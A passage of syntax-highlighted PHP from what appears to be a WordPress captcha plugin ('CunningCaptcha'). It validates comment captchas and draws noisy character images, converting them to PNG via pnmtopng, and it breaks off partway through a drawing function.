<span class="k">if</span> <span class="p">(</span><span class="nv">$uid</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]))</span>
<span class="nx">wp_die</span><span class="p">(</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Error: You need to enter the captcha.'</span><span class="p">));</span>
<span class="nv">$answer</span> <span class="o">=</span> <span class="nb">strip_tags</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]);</span>
<span class="nv">$generated</span> <span class="o">=</span> <span class="nx">get_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strcasecmp</span><span class="p">(</span><span class="nv">$answer</span><span class="p">,</span> <span class="nv">$generated</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="nx">wp_die</span><span class="p">(</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Error: Your supplied captcha is incorrect.'</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$commentdata</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Create the captcha and store the string in the database.</span>
<span class="cm"> */</span>
<span class="k">function</span> <span class="nf">ccaptcha_comment_form_defaults</span><span class="p">(</span><span class="nv">$default</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$answer</span> <span class="o">=</span> <span class="nb">implode</span><span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="nx">ccaptcha_generate</span><span class="p">());</span>
<span class="c1">// Well, that is ugly, but how else?</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">get_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">))</span>
<span class="nx">add_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nv">$answer</span><span class="p">);</span>
<span class="k">else</span>
<span class="nx">update_option</span><span class="p">(</span><span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nv">$answer</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">is_user_logged_in</span><span class="p">())</span> <span class="p">{</span>
<span class="nv">$default</span><span class="p">[</span><span class="s1">'fields'</span><span class="p">][</span><span class="s1">'email'</span><span class="p">]</span> <span class="o">.=</span>
<span class="s1">'<img id="captcha_image" src="'</span><span class="o">.</span><span class="nx">__</span><span class="p">(</span><span class="nx">plugin_dir_url</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">))</span><span class="o">.</span><span class="s1">'captcha.png"></span>
<span class="s1"> <p class="comment-form-captcha"></span>
<span class="s1"> <label for="captcha">'</span><span class="o">.</span><span class="nx">__</span><span class="p">(</span><span class="s1">'Captcha'</span><span class="p">)</span><span class="o">.</span> <span class="s1">'</label></span>
<span class="s1"> <input id="ccaptcha" name="ccaptcha" size="30" type="text" /></p>'</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$default</span><span class="p">;</span>
<span class="p">}</span>
<span class="sd">/*** CunningCaptcha Logic begins ***/</span>
<span class="k">function</span> <span class="nf">ccaptcha_generate</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$h</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="nx">PPM_FILE</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$h</span><span class="p">)</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s2">"fopen() error"</span><span class="p">;</span>
<span class="nb">var_dump</span><span class="p">(</span><span class="nb">error_get_last</span><span class="p">());</span>
<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="nv">$figures</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="nv">$str</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$index</span> <span class="o"><</span> <span class="mi">7</span><span class="p">;</span> <span class="nv">$index</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$choose</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">3</span><span class="p">);</span>
<span class="k">switch</span> <span class="p">(</span><span class="nv">$choose</span><span class="p">)</span> <span class="p">{</span>
<span class="k">case</span> <span class="mi">0</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_1</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'1'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">1</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_7</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'7'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_E</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'E'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">3</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_Z</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'Z'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">default</span><span class="o">:</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nv">$captcha</span> <span class="o">=</span> <span class="nx">glue_figures</span><span class="p">(</span><span class="nv">$figures</span><span class="p">);</span>
<span class="nv">$width</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">*</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$figures</span><span class="p">);</span>
<span class="nv">$height</span> <span class="o">=</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$captcha</span><span class="p">);</span>
<span class="cm">/* write the ppm header */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="s2">"P3</span><span class="se">\n</span><span class="si">$width</span><span class="s2"> </span><span class="si">$height\n255\n</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s1">'fwrite(header) failed'</span><span class="p">;</span>
<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nv">$height</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nv">$width</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span><span class="o">.</span><span class="s2">"</span><span class="se">\t</span><span class="s2">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$h</span><span class="p">);</span>
<span class="cm">/* Convert to png and remove ppm */</span>
<span class="nb">system</span><span class="p">(</span><span class="nb">sprintf</span><span class="p">(</span><span class="s2">"pnmtopng %s > %s && rm %s;"</span><span class="p">,</span>
<span class="nx">PPM_FILE</span><span class="p">,</span> <span class="nx">CAPTCHA_PNG</span><span class="p">,</span> <span class="nx">PPM_FILE</span><span class="p">));</span>
<span class="k">return</span> <span class="nv">$str</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Glue the figures together. Expects an array of figures. Returns</span>
<span class="cm"> * a single array representing the bitmap, ready to print...</span>
<span class="cm"> */</span>
<span class="k">function</span> <span class="nf">glue_figures</span><span class="p">(</span><span class="nv">$array_figures</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$captcha</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="nv">$off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$pad_size</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">16</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$pad_size</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$pad_size</span> <span class="o">-=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// make even</span>
<span class="nv">$pad_size</span> <span class="o">/=</span> <span class="mi">2</span><span class="p">;</span>
<span class="nv">$shift</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$index</span> <span class="o"><</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$array_figures</span><span class="p">);</span> <span class="nv">$index</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$shift</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nv">$pad_size</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="o">+</span><span class="nv">$pad_size</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$off</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">*</span> <span class="nv">$index</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">;</span>
<span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$off</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">></span> <span class="nv">$pad_size</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="o">+</span><span class="nv">$pad_size</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="o">-</span><span class="nv">$shift</span><span class="p">][</span><span class="nv">$off</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$array_figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">][</span><span class="nv">$i</span><span class="o">-</span><span class="nv">$pad_size</span><span class="p">][</span><span class="nv">$j</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$captcha</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Get a random grey scale color to make some noise :) */</span>
<span class="k">function</span> <span class="nf">rand_grey</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$grey</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">180</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">sprintf</span><span class="p">(</span><span class="s2">"%s %s %s"</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* Get a random color */</span>
<span class="k">function</span> <span class="nf">rand_color</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">sprintf</span>
<span class="p">(</span>
<span class="s2">"%s %s %s"</span><span class="p">,</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">),</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">),</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">)</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_1</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$one</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// the number of changing the brush color of the figure</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The tree of the '1'</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// The hook of the '1'</span>
<span class="k">if</span> <span class="p">((</span><span class="nv">$i</span> <span class="o">+</span> <span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span> <span class="o">+</span> <span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">))</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$one</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_7</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$seven</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// the number of changing the brush color of the figure</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The roof of the '7'</span>
<span class="k">if</span> <span class="p">((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&&</span>
<span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The tree of the '7'</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="p">)</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$seven</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_Z</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$z</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// the number of changing the brush color of the figure</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The roof and soil of the 'Z'</span>
<span class="k">if</span> <span class="p">(((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span> <span class="o">&&</span>
<span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The tree of the 'Z'</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="p">)</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$z</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_E</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$e</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// the number of changing the brush color of the figure</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
